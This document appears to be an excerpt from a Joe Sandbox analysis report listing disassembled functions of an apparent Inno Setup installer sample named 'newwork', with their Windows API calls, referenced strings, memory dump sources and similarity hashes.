                                                                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$Move
                                                                                • String ID: isRS-%.3u.tmp
                                                                                • API String ID: 3839737484-3657609586
                                                                                • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1220098344-2970929446
                                                                                • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                APIs
                                                                                  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                • String ID: LoadTypeLib$RegisterTypeLib
                                                                                • API String ID: 1312246647-2435364021
                                                                                • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                Strings
                                                                                • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                • API String ID: 3850602802-3720027226
                                                                                • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                APIs
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • GetFocus.USER32 ref: 00478757
                                                                                • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessageStateTextWaitWindow
                                                                                • String ID: Wnd=$%x
                                                                                • API String ID: 1381870634-2927251529
                                                                                • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                APIs
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$LocalSystem
                                                                                • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                • API String ID: 1748579591-1013271723
                                                                                • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesDeleteErrorLastMove
                                                                                • String ID: DeleteFile$MoveFile
                                                                                • API String ID: 3024442154-139070271
                                                                                • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                • API String ID: 47109696-2631785700
                                                                                • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                Strings
                                                                                • CSDVersion, xrefs: 00483BFC
                                                                                • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                • API String ID: 3677997916-1910633163
                                                                                • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                • API String ID: 1646373207-4063490227
                                                                                • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                • API String ID: 1646373207-260599015
                                                                                • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                • API String ID: 1646373207-597752486
                                                                                • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                • API String ID: 1646373207-834958232
                                                                                • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                APIs
                                                                                  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2238633743-2683653824
                                                                                • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                APIs
                                                                                  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
